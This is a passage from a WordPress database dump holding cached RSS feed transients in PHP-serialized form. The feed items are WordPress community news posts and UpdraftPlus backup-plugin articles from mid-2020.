+0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:46;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"WordPress.org blog: WordPress 5.5 Beta 4\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:34:\"https://wordpress.org/news/?p=8719\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"https://wordpress.org/news/2020/07/wordpress-5-5-beta-4/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3766:\"<p>WordPress 5.5 Beta 4 is now available!</p>\n\n\n\n<p id=\"block-81bd56b9-ea44-43ad-ab36-a5ae78b54375\"><strong>This software is still in development,</strong> so it’s not recommended to run this version on a production site. Consider setting up a test site to play with the new version.</p>\n\n\n\n<p id=\"block-7cc1bbc6-17f9-44c5-8f67-da4e3059ad69\">You can test WordPress 5.5 Beta 4 in two ways:</p>\n\n\n\n<ul id=\"block-4840af57-f44b-4d9f-aa64-c6a452392e42\"><li>Try the <a href=\"https://wordpress.org/plugins/wordpress-beta-tester/\">WordPress Beta Tester</a> plugin (choose the “bleeding edge nightlies” option)</li><li>Or <a href=\"https://wordpress.org/wordpress-5.5-beta4.zip\">download the beta here</a> (zip).</li></ul>\n\n\n\n<p id=\"block-a40528cb-eb3b-4c8a-8f5e-aa700f1ba086\">WordPress 5.5 is slated for release on <a href=\"https://make.wordpress.org/core/5-5/\">August 11th, 2020</a>, and <strong>we need your help to get there</strong>!</p>\n\n\n\n<p>Thank you to all of the contributors who tested the <a href=\"https://wordpress.org/news/2020/07/wordpress-5-5-beta-3/\">beta 3</a> development release and gave feedback. Testing for bugs is a critical part of polishing every release and a great way to contribute to WordPress. </p>\n\n\n\n<h2 id=\"block-15d6d57f-905d-4a47-9f66-839468a5375a\">Some highlights</h2>\n\n\n\n<p id=\"block-85da84ec-c841-42f9-8d3b-1a4537a61d10\">Since <a href=\"https://wordpress.org/news/2020/02/wordpress-5-4-beta-3/\">beta 3</a>, <a href=\"https://core.trac.wordpress.org/query?status=closed&changetime=07%2F22%2F2020..07%2F28%2F2020&milestone=5.5&group=component&col=id&col=summary&col=owner&col=type&col=priority&col=component&col=version&order=priority\">43 bugs</a> have been fixed. Here are a few changes in beta 4:</p>\n\n\n\n<ul><li>Add <code>\"loading\"</code> as an allowed kses image attribute (see <a href=\"https://core.trac.wordpress.org/ticket/50731\">#50731</a>).</li><li>Add filter for the plugin/theme auto-update message in the Info tab of Site health (see <a rel=\"noreferrer noopener\" target=\"_blank\" href=\"https://core.trac.wordpress.org/ticket/50663\">#50663</a>).</li><li><code>$_SERVER[\'SERVER_NAME\']</code> not a reliable when generating email host names (see <a href=\"https://core.trac.wordpress.org/ticket/25239\">#25239</a>)</li><li>Several backported fixes from Gutenberg are included in WordPress 5.5 Beta 4 (<a href=\"https://github.com/WordPress/gutenberg/pull/24218\">See PR #24218</a>)</li></ul>\n\n\n\n<h2 id=\"block-76156b2b-0a52-4502-b585-6cbe9481f55b\">Developer notes</h2>\n\n\n\n<p id=\"block-3fe5e264-0a95-4f12-9a18-0cb9dc5955d1\">WordPress 5.5 has lots of refinements to polish the developer experience. To keep up, subscribe to the <a href=\"https://make.wordpress.org/core/\">Make WordPress Core blog</a> and pay special attention to the <a href=\"https://make.wordpress.org/core/tag/5-5+dev-notes/\">developers’ notes</a> for updates on those and other changes that could affect your products.</p>\n\n\n\n<h2 id=\"block-bc89fd56-47b0-439f-8e2c-4a642c80a616\">How to Help</h2>\n\n\n\n<p id=\"block-3ff83a77-8b54-4061-ae2d-45fc984cbd76\">Do you speak a language other than English? <a href=\"https://translate.wordpress.org/projects/wp/dev/\">Help translate WordPress into more than 100 languages</a>!</p>\n\n\n\n<p id=\"block-9d871099-ec49-446c-8322-9e49b7498c10\">If you think you’ve found a bug, you can post to the <a href=\"https://wordpress.org/support/forum/alphabeta/\">Alpha/Beta area</a> in the support forums. We’d love to hear from you!</p>\n\n\n\n<p id=\"block-bd71c1d3-39d9-4b2a-8193-3486497b45fd\">If you’re comfortable writing a reproducible bug report, <a href=\"https://core.trac.wordpress.org/newticket\">file one on WordPress Trac</a>, where you can also find a list of <a href=\"https://core.trac.wordpress.org/tickets/major\">known bugs</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 27 Jul 2020 20:56:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"David Baumwald\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:47;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:47:\"Donncha: Crowdsignal Polls in your Block Editor\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"https://odd.blog/?p=89503098\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"https://odd.blog/2020/07/27/crowdsignal-polls-in-your-block-editor/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2423:\"<div class=\"aligncenter crowdsignal-poll-wrapper\"></div>\n\n\n<p>The <a href=\"https://crowdsignal.com/\">Crowdsignal</a> team at Automattic have been quietly working on a new <a href=\"https://wordpress.org/plugins/crowdsignal-forms/\">poll block</a> for the last few weeks. We finally made it public today on WordPress.org!</p>\n\n\n\n<div class=\"wp-block-image\"><img /></div>\n\n\n\n<p>We set out with the task of creating a block that would allow the writer to quickly insert a poll in their posts using the block editor. More than that, it had to be simple to use. It also needed to be themed to match the look and feel of the website it would appear on.</p>\n\n\n\n<div class=\"wp-block-image size-large\"><img /></div>\n\n\n\n<p>We&#8217;ve created a block that does that. It also records the votes collected on the Crowdsignal website where you can analyse the results using reports Crowdsignal users have always used.</p>\n\n\n\n<div class=\"wp-block-image size-large\"><img /></div>\n\n\n\n<p>Search for &#8220;Crowdsignal Forms&#8221; on your plugins page to install it in the usual way.</p>\n\n\n\n<p>A free <a href=\"https://crowdsignal.com/\">Crowdsignal</a> account is required to use the block. We made it really easy to connect your site to your Crowdsignal account. If you don&#8217;t have one then creating a new account is simple too.</p>\n\n\n\n<div class=\"wp-block-image\"><img /></div>\n\n\n\n<p>The first 2,500 responses you collect are included in your free account, and further votes are recorded but free users are encouraged to upgrade if they want to do further analysis of all the data they collect.</p>\n\n<p><strong>Related Posts</strong><ul><li> <a href=\"https://odd.blog/2004/01/29/htmlarea-the-free-customizable-online-editor/\" rel=\"bookmark\" title=\"Permanent Link: HTMLArea &#8212; the free, customizable online editor\">HTMLArea &#8212; the free, customizable online editor</a></li><li> <a href=\"https://odd.blog/2003/04/02/cross-browser-rich-text-editor/\" rel=\"bookmark\" title=\"Permanent Link: Cross-Browser Rich Text Editor\">Cross-Browser Rich Text Editor</a></li><li> <a href=\"https://odd.blog/2003/05/22/cross-browser-rich-text-editor-work-in-firebird/\" rel=\"bookmark\" title=\"Permanent Link: Cross-Browser Rich Text Editor &#8211; work in Firebird?\">Cross-Browser Rich Text Editor &#8211; work in Firebird?</a></li></ul></p>\n<p><a href=\"https://odd.blog/2020/07/27/crowdsignal-polls-in-your-block-editor/\" rel=\"nofollow\">Source</a></p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 27 Jul 2020 19:17:46 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:7:\"Donncha\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:48;a:6:{s:4:\"data\";s:11:\"\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:36:\"HeroPress: HeroPress Gets A Surprise\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"https://heropress.com/?p=3242\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:117:\"https://heropress.com/heropress-gets-a-surprise/#utm_source=rss&utm_medium=rss&utm_campaign=heropress-gets-a-surprise\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1373:\"<img width=\"960\" height=\"540\" src=\"https://s20094.pcdn.co/wp-content/uploads/2020/07/heropress_cape_video_thumb-1024x576.jpg\" class=\"attachment-large size-large wp-post-image\" alt=\"Topher wearing his cape.\" />\n<p>A couple of months ago <a href=\"https://twitter.com/michelleames\">Michelle Frechette</a> approached me about being on a podcast for <a href=\"https://sentree.io\">Sentree.io</a>. I didn&#8217;t realize at the time I was going to be their inaugural guest! We had a great time, and things got back to normal.</p>\n\n\n\n<p>Several weeks later Michelle said they sent me a thanks gift, which was very thoughtful, and that I should have someone video the unboxing. I never once imagined what they actually sent me.  Here&#8217;s the video.</p>\n\n\n\n<div class=\"wp-block-embed__wrapper\">\n<div class=\"jetpack-video-wrapper\"></div>\n</div>\n\n\n\n<p>My family already has all sorts of ideas about how to use it at WordCamps. I just hope it survives being worn ALL DAY EVERY DAY.</p>\n\n\n\n<p>It&#8217;s super well made, I snooped a little and found the etsy shop it came from. Really great embroidery and seaming. Really classy.</p>\n\n\n\n<p>Thanks Sentree, and thanks Michelle.  :)</p>\n<p>The post <a rel=\"nofollow\" href=\"https://heropress.com/heropress-gets-a-surprise/\">HeroPress Gets A Surprise</a> appeared first on <a rel=\"nofollow\" href=\"https://heropress.com\">HeroPress</a>.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Mon, 27 Jul 2020 13:31:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:49;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"WPTavern: Develop, Test, and Showcase Blocks in Isolation With BlockBook\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wptavern.com/?p=102310\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:185:\"https://wptavern.com/develop-test-and-showcase-blocks-in-isolation-with-blockbook?utm_source=rss&utm_medium=rss&utm_campaign=develop-test-and-showcase-blocks-in-isolation-with-blockbook\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4143:\"<p class=\"has-drop-cap\">Riad Benguella <a href=\"https://riad.blog/2020/07/22/introducing-blockbook-for-wordpress/\">released BlockBook</a>, a project that promises to overhaul how developers build blocks and more, on Tuesday. It is a development environment that allows creators to work with blocks in isolation, outside of WordPress. Developers can view individual block properties and test output from a defined block library.</p>\n\n\n\n<p>BlockBook is available as an <a href=\"https://www.npmjs.com/package/blockbook-cli\">npm package</a>. Developers can also contribute to the project through its <a href=\"https://github.com/youknowriad/blockbook\">GitHub repository</a>.</p>\n\n\n\n<p>Benguella got the idea from <a href=\"https://storybook.js.org/\">Storybook</a>, which is an open-source tool for developing UI components for React, Vue, Angular, and other JavaScript libraries in isolation. It is an environment that makes development and testing more efficient for individual components. It also allows end-users the opportunity to test those components before they are brought into a project. The goal for BlockBook is to bring a similar system to WordPress block development.</p>\n\n\n\n<p>&ldquo;If we think about it a little bit, blocks are reusable units that can live on their own outside of any context, they can be edited visually, and they produce markup,&rdquo; wrote Benguella in the announcement post. &ldquo;They have in fact a lot in common with React Components. They are super-powered React Components.&rdquo;</p>\n\n\n\n<p>He believes that BlockBook will be able to solve many of the issues around block development by taking the principles of the Storybook application and employing them into an environment specifically for building, testing, documenting, and sharing blocks.</p>\n\n\n\n<p>Benguella has a full <a href=\"https://youknowriad.github.io/blockbook/\">demo available</a> as a GitHub page. Developers can do the same with their plugins or simply host it as a static site on their own server.</p>\n\n\n\n<img />BlockBook example output of the Gallery block.\n\n\n\n<p>In his post, he identified three major challenges that his project is meeting head-on. The first, and most obvious for anyone who has delved into block development, is creating blocks within the WordPress environment. It is a tedious and inefficient process to develop and test blocks in the WordPress admin. By isolating the block code, developers can bypass many of the routine tasks every time they make a code change to a block.</p>\n\n\n\n<p>The second challenge was to figure out a way to make theme testing much easier. For theme authors with one or two themes, testing block styling is relatively easy. However, for businesses, agencies, and others who maintain many themes, there is no good way to quickly see how individual blocks behave for each of the themes. BlockBook allows theme authors to register any number of themes. Essentially, developers add a few lines of code and point to the appropriate stylesheet. Once set up, testing is as simple as switching themes via a dropdown select and moving between individual blocks. All of this happens almost instantly.</p>\n\n\n\n<p>The third part of the equation involves end-users. Currently, users have no good way to test blocks without installing a block plugin, heading to their editor, and tinkering around with it. If they do not like the block, they must start the process all over again. With BlockBook, developers can make their blocks available for testing beforehand. They can even allow end-users to beta test blocks and provide feedback without installing a plugin at all.</p>\n\n\n\n<p>However, that is still not quite as efficient as Benguella would like. It would rely on individual developers. For the long-term, he hopes the project becomes an official WordPress package. This creates the possibility of WordPress.org automatically building and hosting a BlockBook for plugins and themes, giving users a chance to test before installing.</p>\n\n\n\n<p>This is something that could be revolutionary for users if the official WordPress project could take it on and create a solid user experience around it.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 24 Jul 2020 19:00:52 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:14:\"Justin Tadlock\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}}}}}}}}}}}}s:4:\"type\";i:128;s:7:\"headers\";O:42:\"Requests_Utility_CaseInsensitiveDictionary\":1:{s:7:\"\0*\0data\";a:8:{s:6:\"server\";s:5:\"nginx\";s:4:\"date\";s:29:\"Tue, 25 Aug 2020 12:19:10 GMT\";s:12:\"content-type\";s:8:\"text/xml\";s:4:\"vary\";s:15:\"Accept-Encoding\";s:13:\"last-modified\";s:29:\"Tue, 25 Aug 2020 12:15:06 GMT\";s:15:\"x-frame-options\";s:10:\"SAMEORIGIN\";s:4:\"x-nc\";s:9:\"HIT ord 2\";s:16:\"content-encoding\";s:2:\"br\";}}s:5:\"build\";s:14:\"20200501235608\";}','no'),(61608,'_transient_timeout_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1598401150','no'),(61609,'_transient_feed_mod_d117b5738fbd35bd8c0391cda1f2b5d9','1598357950','no'),(61610,'_transient_timeout_feed_e0061ca2fa5b884e483872aa34d3e7eb','1598401150','no'),(61611,'_transient_feed_e0061ca2fa5b884e483872aa34d3e7eb','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:49:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:4:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:11:\"UpdraftPlus\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:23:\"https://updraftplus.com\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"WordPress\'s leading backup plugin - backup, restore and clone WordPress sites\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Aug 2020 12:51:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"en-US\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:9:\"generator\";a:1:{i:0;a:5:{s:4:\"data\";s:30:\"https://wordpress.org/?v=5.4.2\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:73:\"\n		\n		\n					\n		\n		\n		\n				\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:6:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:60:\"How to add Google Drive to your UpdraftPlus account settings\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://feedproxy.google.com/~r/UpdraftPlus/~3/iPALaoG6mcs/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"https://updraftplus.com/how-to-add-google-drive-to-your-updraftplus-account-settings/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 20 Aug 2020 12:51:42 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Uncategorized\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:33:\"https://updraftplus.com/?p=643739\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:782:\"<p>When backing up your WordPress website with UpdraftPlus, you have the option of using several remote storage options in which to save your backup files. One of the most popular storage locations is Google Drive, as it offers 15GB of &#8230; <a href=\"https://updraftplus.com/how-to-add-google-drive-to-your-updraftplus-account-settings/\">Continue reading <span class=\"meta-nav\">&#8594;</span></a></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/how-to-add-google-drive-to-your-updraftplus-account-settings/\">How to add Google Drive to your UpdraftPlus account settings</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Wayne Mullins\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:40:\"http://purl.org/rss/1.0/modules/content/\";a:1:{s:7:\"encoded\";a:1:{i:0;a:5:{s:4:\"data\";s:1773:\"<p><span style=\"font-weight: 400;\">When backing up your WordPress website with UpdraftPlus, you have the option of using several remote storage options in which to save your backup files.</span></p>\n<p><span style=\"font-weight: 400;\">One of the most popular storage locations is </span><a href=\"https://www.google.com/drive/\"><span style=\"font-weight: 400;\">Google Drive</span></a><span style=\"font-weight: 400;\">, as it offers 15GB of free remote storage, has a world-wide reputation for security and dependability and is a quick and easy remote storage option to connect to as pretty much everyone already has a Gmail account already setup. </span></p>\n<p><span style=\"font-weight: 400;\">As user interfaces and setup processes change rapidly, we at UpdraftPlus are constantly updating the latest ‘how-to’ videos, so users have a clear understanding of how to connect Google Drive and other remote backup options to their UpdraftPlus account. </span></p>\n<p><span style=\"font-weight: 400;\">To find out how to add Google Drive to your UpdraftPlus backup settings, just follow the video below for a step-by-step instructions.</span></p>\n<p><iframe title=\"How to add Google Drive to your UpdraftPlus account settings\" src=\"https://player.vimeo.com/video/428043381?dnt=1&amp;app_id=122963\" width=\"1080\" height=\"608\" frameborder=\"0\" allow=\"autoplay; fullscreen\" allowfullscreen></iframe></p>\n<p>The post <a rel=\"nofollow\" href=\"https://updraftplus.com/how-to-add-google-drive-to-your-updraftplus-account-settings/\">How to add Google Drive to your UpdraftPlus account settings</a> appeared first on <a rel=\"nofollow\" href=\"https://updraftplus.com\">UpdraftPlus</a>. <a href=\"http://updraftplus.com\">UpdraftPlus - Backup, restore and migration plugin for WordPress.</a></p>\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:90:\"https://updraftplus.com/how-to-add-google-drive-to-your-updraftplus-account-settings/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"0\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:85:\"https://updraftplus.com/how-to-add-google-drive-to-your-updraftplus-account-settings/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:79:\"\n		\n		\n					\n		\n		\n		\n				\n		\n		\n		\n\n					\n										\n					\n					\n			\n		\n		\n			\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:6:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:38:\"Easy Updates Manager and WordPress 5.5\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:58:\"http://feedproxy.google.com/~r/UpdraftPlus/~3/346-jgo0dic/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://updraftplus.com/easy-updates-manager-and-wordpress-5-5/#respond\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 13 Aug 2020 16:18:47 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:3:{i:0;a:5:{s:4:\"data\";s:20:\"Easy Updates 